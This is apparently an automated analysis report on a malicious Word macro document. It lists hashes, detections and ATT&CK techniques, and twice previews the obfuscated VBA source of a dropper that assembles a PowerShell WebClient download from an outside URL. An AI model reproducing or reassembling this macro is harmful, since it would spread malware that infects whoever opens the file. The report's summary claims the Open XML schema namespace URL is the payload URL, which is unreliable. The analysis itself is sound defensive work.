Office (OLE) malware analysis — malicious · 69b0aff1321ff1ee

MALICIOUS

Office (OLE)

149.0 KB Created: 2018-02-15 00:08:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 5b9b8054b8a874fe7e1f2773cdceec96 SHA-1: b978b78488ca59d93c40cfb8b53fff5c9f18fe13 SHA-256: 69b0aff1321ff1eef57e7327586ac4dd495910e9f09a4fe4cd7681ae1e89e0d1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present and configured to execute, further suggesting malicious intent. The VBA script attempts to download and execute a second-stage payload using the reconstructed URL 'http://schemas.openxmlformats.org/drawingml/2006/main'.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6453491-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6453491-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31973 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31973 bytes
SHA-256: `cb8c4cab5dbbe7c29b289f04082366e6b751837d4a955057ffe770b7229a75ad`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "uiamiwq" Function simVQWjHOdd() On Error Resume Next aFYRds = (opWNErtw - Int(mXNOhq) * WwJipujIOjtr / Oct(NkriPJmwDuSdI) - (GZvQEtcQpvJdtI - Sin(2805218))) VrljDtIds = (VzCErCfjzYEpSD - Int(EjuaiTSpzPzuv) * mPihFYUb / Oct(IDtMR) - (pnwlFFwziff - Sin(660610))) FTEnmpAcnsD = (EouHjP - Int(IaHMiVc) * mWoGAJIbzI / Oct(OqQvBZVMXPNwK) - (FXPjlHjcTMLqYC - Sin(9732696))) pcjWqVLrK = (flkOmoEs) + HJjkJKD("wRsIcuwUjkdwmTZYjainext(1Fai+Fai0000Fai+Ff8Z+f8Zai, 28Fai'+'+Fai2133Fai+FaiByS+ByS)Fai+Fai;nuBAFai+FaiDCFai+f8Z+f8ZFaiX =ByS+ByS eKcFai+Fai Fai+FByS+BySaf8Z+f8Zihf8Z+f8ZFai+FaittFaBy'+'S+BySi+FaipFai+f8'+'Z+fbSIQ", 18, 191) zKztZahRCOI = (WDkKASNbCRzR - Int(iilazzZXFnkLOG) * CRhzlNz / Oct(tvmqvdKHdNNN) - (HVQDhO - Sin(3284257))) skUzYCzXVjY = (zwmLBZlk - Int(fijqrfLHiuufHw) * tEuvR / Oct(DziYtwAiuDZXi) - (iiRQqFwDUWk - Sin(8565164))) qbzliUiO = (kSzip - Int(EbjARzjK) * jqVIcPXPni / Oct(LwAfMn) - (vPMwY - Sin(6904191))) VKwAJ = (aiJvmtvOBH) + HJjkJKD("DnjNCuwtoijGhPaVZlLCwVySm.Net.WebCliFai+Faient;nuBNFai+FaiSB = nFai+FaiuBFai+FainFai+Faisadasd.FaByS+BySi+FbOsHkYL", 23, 85) tfihRZzjz = (CKAkHGb - Int(odwnv) * nRlEDJcm / Oct(LwRfjBLMlKCJ) - (YzwTiqoVVTzC - Sin(6238909))) jQoSIXtB = (PXMbkPW - Int(lpauCdRLdsGA) * lHjimzSpfSdAq / Oct(oZiStPjNGskoLD) - (pHvfRiP - Sin(5467193))) ikObmp = (wSEwGXzuLicluZ - Int(kJYAruz) * OipLiUYRZwmU / Oct(LlGjupcdaZ) - (hivIGOkBAjpTR - Sin(2341125))) zbvmi = (HuSTdBbPk) + HJjkJKD("KS+f8Z+f8ZBySi in Fai+FainuFaf8Z+f8Z'+'i+FaiBADCByS+BySXFai+Fai){tr'+'y{f8Z+f8Znuf8Z+f8ZBFai+Ff8Z+f8ZaiYFai+FaiYU.pQByS+BySZDon8fFai+FaiWnlFai+Faf8Z+f8Zin8fOaNLSDpqFCXv", 2, 157) OGfwGSHz = (ZQLLL - Int(TvVRpXfPpMXk) * cwWjowowfXCO / Oct(iOAWFrdXl) - (DHbuRpfwPVIBD - Sin(538779))) cMKSGcStwz = (WOXnoYTDToQ - Int(TGfGOqG) * cNCWHAbm / Oct(NhLwqjdFkzRjE) - (FAaMpk - Sin(2878864))) fwJdFRuqZ = (LzjDJLBfnzhKG - Int(FQcXCB) * sojYFzWhnl / Oct(dTVOO) - (aREEJUCtBzuJ - Sin(6874876))) kzjzjjT = (YYRRwEVInFvd) + HJjkJKD("zwwWdhfXHFai+FaiYYU Fai+Fai= .(eFai+FaiIROCBNXZEaDGidkwmCcHzKXobWAuaU", 10, 30) iSwCwUM = (pzkzZ - Int(UhfDzbXDTUP) * CFOHW / Oct(ZGJIX) - (OLDHtVz - Sin(3094539))) IGXCKb = (koSzzOCawsKRk - Int(loiahXTYLKT) * oYQKzXzMSRvIW / Oct(XfNQMuicRTLu) - (sWLdIjKa - Sin(5839721))) WIVGMKEo = (munRXQ - Int(saEsAnLu) * ZLLGzwDHHqGomb / Oct(OsVbVZc) - (LzalpX - Sin(8460002))) ERQTLEjGbwM = (iwALfhnmr) + HJjkJKD("HPJWYZmnuFaiByf8Z+f8ZS+ByS+Faif8Z+f8ZBasfcFai+FaBf8Z+f8ZykQjDKnVXXjtnzfijsWYjz", 8, 50) qdtndsN = (kZYwEAIW - Int(NjPHGGb) * NAUInisRZ / Oct(SUnzt) - (QQImJtOOqbd - Sin(9305767))) MnQjhjl = (ZDZddidmKwvfif - Int(qBZQpfrqzpLUlF) * MAwWAztr / Oct(SQzFTN) - (fOPYoB - Sin(2507077))) VJGrzKCb = (PiNboS - Int(rhskuj) * iBwKOz / Oct(ilWjjfFWh) - (KnqGSjRDsI - Sin(4663586))) mSUKJmAqSi = (jKfFwsdH) + HJjkJKD("MQmdIabjzzUBRzlai+Fai5cGByS+ByS/f8Z+f8Z?htFai+FaByS+BySitpFai+Fai:Fai+Fai//reaFai+Fail-Fai+FaiexpFaif8Z+f8Z'+'+BzFYw", 16, 97) YNQTRma = (PaGtBMRfHWoBSX - Int(QLJWHFwXYJYV) * ZwGDCQwHMiVXz / Oct(XQafPYCbsciNtQ) - (ijcqY - Sin(998370))) djkUAzV = (QlwBZj - Int(hnwKJ) * HzdJwpwFdV / Oct(WhEiusjYrPzp) - (OzWXLpjDkqw - Sin(7079331))) vbLpjZcGfRP = (TtiGCn - Int(JirbZnuR) * SLHIwuzTbuol / Oct(mrItnZnpkMMZ) - (jHuzXuSRS - Sin(5919136))) UUksHXkO = (mPjhwrrEmEV) + HJjkJKD("WCc.f8Z+f8ZpQZFai+f8'+'Z+f8ZFaiToFai'+'+FaiStrnFai+ByS+BySVbCdtcjvNkmzoRTmHmzWWosLrZjfzrAhLEjH", 3, 56) MNldusJWGf = (LqYiWtTUU - Int(TQiAqaG) * NuzrG / Oct(QYYnVkfutj) - (GqzmFLC - Sin(4665420))) YzuJfcVPWi = (zPUVnVawjnaU - Int(zOzVfzjhZWv) * kkGRIjwSRcAD / Oct(zAKjO) - (ItWslo - Sin(6868137))) WzdjviaddV = (CpHatZiDkUi - Int(EdBRVNuSj) * ZzKQmtNsUdYDtd / Oct(BHiUvP) - (EqBisFXXtRwDP - Sin(1890825))) moTvZ = (jzVivhzui) + HJjkJKD("piZNthAR]108f8'+'Z+f8Z+[ChAR]55+[f8Z+f8ZChAR]72),BySLopBySf8Z+f8Z).rEpLaCE(([ChAR'+']70+[ChAf8Z ... (truncated)

SHA-256: cb8c4cab5dbbe7c29b289f04082366e6b751837d4a955057ffe770b7229a75ad

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "uiamiwq"
Function simVQWjHOdd()
On Error Resume Next
aFYRds = (opWNErtw - Int(mXNOhq) * WwJipujIOjtr / Oct(NkriPJmwDuSdI) - (GZvQEtcQpvJdtI - Sin(2805218)))
VrljDtIds = (VzCErCfjzYEpSD - Int(EjuaiTSpzPzuv) * mPihFYUb / Oct(IDtMR) - (pnwlFFwziff - Sin(660610)))
FTEnmpAcnsD = (EouHjP - Int(IaHMiVc) * mWoGAJIbzI / Oct(OqQvBZVMXPNwK) - (FXPjlHjcTMLqYC - Sin(9732696)))
pcjWqVLrK = (flkOmoEs) + HJjkJKD("wRsIcuwUjkdwmTZYjainext(1Fai+Fai0000Fai+Ff8Z+f8Zai, 28Fai'+'+Fai2133Fai+FaiByS+ByS)Fai+Fai;nuBAFai+FaiDCFai+f8Z+f8ZFaiX =ByS+ByS eKcFai+Fai Fai+FByS+BySaf8Z+f8Zihf8Z+f8ZFai+FaittFaBy'+'S+BySi+FaipFai+f8'+'Z+fbSIQ", 18, 191)
zKztZahRCOI = (WDkKASNbCRzR - Int(iilazzZXFnkLOG) * CRhzlNz / Oct(tvmqvdKHdNNN) - (HVQDhO - Sin(3284257)))
skUzYCzXVjY = (zwmLBZlk - Int(fijqrfLHiuufHw) * tEuvR / Oct(DziYtwAiuDZXi) - (iiRQqFwDUWk - Sin(8565164)))
qbzliUiO = (kSzip - Int(EbjARzjK) * jqVIcPXPni / Oct(LwAfMn) - (vPMwY - Sin(6904191)))
VKwAJ = (aiJvmtvOBH) + HJjkJKD("DnjNCuwtoijGhPaVZlLCwVySm.Net.WebCliFai+Faient;nuBNFai+FaiSB = nFai+FaiuBFai+FainFai+Faisadasd.FaByS+BySi+FbOsHkYL", 23, 85)
tfihRZzjz = (CKAkHGb - Int(odwnv) * nRlEDJcm / Oct(LwRfjBLMlKCJ) - (YzwTiqoVVTzC - Sin(6238909)))
jQoSIXtB = (PXMbkPW - Int(lpauCdRLdsGA) * lHjimzSpfSdAq / Oct(oZiStPjNGskoLD) - (pHvfRiP - Sin(5467193)))
ikObmp = (wSEwGXzuLicluZ - Int(kJYAruz) * OipLiUYRZwmU / Oct(LlGjupcdaZ) - (hivIGOkBAjpTR - Sin(2341125)))
zbvmi = (HuSTdBbPk) + HJjkJKD("KS+f8Z+f8ZBySi in Fai+FainuFaf8Z+f8Z'+'i+FaiBADCByS+BySXFai+Fai){tr'+'y{f8Z+f8Znuf8Z+f8ZBFai+Ff8Z+f8ZaiYFai+FaiYU.pQByS+BySZDon8fFai+FaiWnlFai+Faf8Z+f8Zin8fOaNLSDpqFCXv", 2, 157)
OGfwGSHz = (ZQLLL - Int(TvVRpXfPpMXk) * cwWjowowfXCO / Oct(iOAWFrdXl) - (DHbuRpfwPVIBD - Sin(538779)))
cMKSGcStwz = (WOXnoYTDToQ - Int(TGfGOqG) * cNCWHAbm / Oct(NhLwqjdFkzRjE) - (FAaMpk - Sin(2878864)))
fwJdFRuqZ = (LzjDJLBfnzhKG - Int(FQcXCB) * sojYFzWhnl / Oct(dTVOO) - (aREEJUCtBzuJ - Sin(6874876)))
kzjzjjT = (YYRRwEVInFvd) + HJjkJKD("zwwWdhfXHFai+FaiYYU Fai+Fai= .(eFai+FaiIROCBNXZEaDGidkwmCcHzKXobWAuaU", 10, 30)
iSwCwUM = (pzkzZ - Int(UhfDzbXDTUP) * CFOHW / Oct(ZGJIX) - (OLDHtVz - Sin(3094539)))
IGXCKb = (koSzzOCawsKRk - Int(loiahXTYLKT) * oYQKzXzMSRvIW / Oct(XfNQMuicRTLu) - (sWLdIjKa - Sin(5839721)))
WIVGMKEo = (munRXQ - Int(saEsAnLu) * ZLLGzwDHHqGomb / Oct(OsVbVZc) - (LzalpX - Sin(8460002)))
ERQTLEjGbwM = (iwALfhnmr) + HJjkJKD("HPJWYZmnuFaiByf8Z+f8ZS+ByS+Faif8Z+f8ZBasfcFai+FaBf8Z+f8ZykQjDKnVXXjtnzfijsWYjz", 8, 50)
qdtndsN = (kZYwEAIW - Int(NjPHGGb) * NAUInisRZ / Oct(SUnzt) - (QQImJtOOqbd - Sin(9305767)))
MnQjhjl = (ZDZddidmKwvfif - Int(qBZQpfrqzpLUlF) * MAwWAztr / Oct(SQzFTN) - (fOPYoB - Sin(2507077)))
VJGrzKCb = (PiNboS - Int(rhskuj) * iBwKOz / Oct(ilWjjfFWh) - (KnqGSjRDsI - Sin(4663586)))
mSUKJmAqSi = (jKfFwsdH) + HJjkJKD("MQmdIabjzzUBRzlai+Fai5cGByS+ByS/f8Z+f8Z?htFai+FaByS+BySitpFai+Fai:Fai+Fai//reaFai+Fail-Fai+FaiexpFaif8Z+f8Z'+'+BzFYw", 16, 97)
YNQTRma = (PaGtBMRfHWoBSX - Int(QLJWHFwXYJYV) * ZwGDCQwHMiVXz / Oct(XQafPYCbsciNtQ) - (ijcqY - Sin(998370)))
djkUAzV = (QlwBZj - Int(hnwKJ) * HzdJwpwFdV / Oct(WhEiusjYrPzp) - (OzWXLpjDkqw - Sin(7079331)))
vbLpjZcGfRP = (TtiGCn - Int(JirbZnuR) * SLHIwuzTbuol / Oct(mrItnZnpkMMZ) - (jHuzXuSRS - Sin(5919136)))
UUksHXkO = (mPjhwrrEmEV) + HJjkJKD("WCc.f8Z+f8ZpQZFai+f8'+'Z+f8ZFaiToFai'+'+FaiStrnFai+ByS+BySVbCdtcjvNkmzoRTmHmzWWosLrZjfzrAhLEjH", 3, 56)
MNldusJWGf = (LqYiWtTUU - Int(TQiAqaG) * NuzrG / Oct(QYYnVkfutj) - (GqzmFLC - Sin(4665420)))
YzuJfcVPWi = (zPUVnVawjnaU - Int(zOzVfzjhZWv) * kkGRIjwSRcAD / Oct(zAKjO) - (ItWslo - Sin(6868137)))
WzdjviaddV = (CpHatZiDkUi - Int(EdBRVNuSj) * ZzKQmtNsUdYDtd / Oct(BHiUvP) - (EqBisFXXtRwDP - Sin(1890825)))
moTvZ = (jzVivhzui) + HJjkJKD("piZNthAR]108f8'+'Z+f8Z+[ChAR]55+[f8Z+f8ZChAR]72),BySLopBySf8Z+f8Z).rEpLaCE(([ChAR'+']70+[ChAf8Z
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.